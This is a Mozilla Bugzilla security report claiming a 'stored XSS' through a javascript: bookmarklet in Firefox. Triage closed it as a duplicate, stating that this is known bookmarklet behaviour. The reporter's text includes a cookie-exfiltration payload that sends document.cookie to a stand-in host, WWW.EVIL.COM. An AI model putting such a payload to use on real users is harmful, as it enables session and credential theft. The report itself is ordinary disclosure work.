Closed
Bug 1510537
Opened 6 years ago
Closed 6 years ago
Stored XSS in Bookmark button
Categories
(Core :: Security, defect)
Core
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 371923
People
(Reporter: muaz.work66, Unassigned)
Details
Attachments
(1 file)
328.46 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Steps to reproduce:
1. Open Mozilla Firefox browser.
2. Add a new bookmark by clicking "New Bookmark..." from Bookmarks Toolbar.
3. Enter any name to the Name field.
4. Enter the following payload in the Location field.
javascript:prompt(document.domain,document.cookie)
5. Click Add button. Your bookmark will be saved.
6. Open any website from Mozilla Firefox, such as PayPal, Skrill, Gmail, Uber, Facebook etc.
7. Now click your new Bookmark button.
8. XSS will be triggered with current domain and cookies.
9. It will work on any website in Mozilla Firefox browser.
Actual results:
While click on the button (which location was set to payload), current website's domain and cookies' are poped-up with XSS.
Expected results:
This bug allow an attacker to steal users' cookies, credentials and able to do more. If an attacker use the following payload, then he can silently steal cookies and redirect the user to an evil site.
Payload: javascript:document.location='http://WWW.EVIL.COM/cookiestealer.php?c='+document.cookie
Comment 1•6 years ago
|
||
This is a known feature of javascript bookmarklets, and not a bug. The user has to add and run the bookmark themselves.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Updated•6 years ago
|
Component: Untriaged → Security
Product: Firefox → Core
You need to log in
before you can comment on or make changes to this bug.
Description
•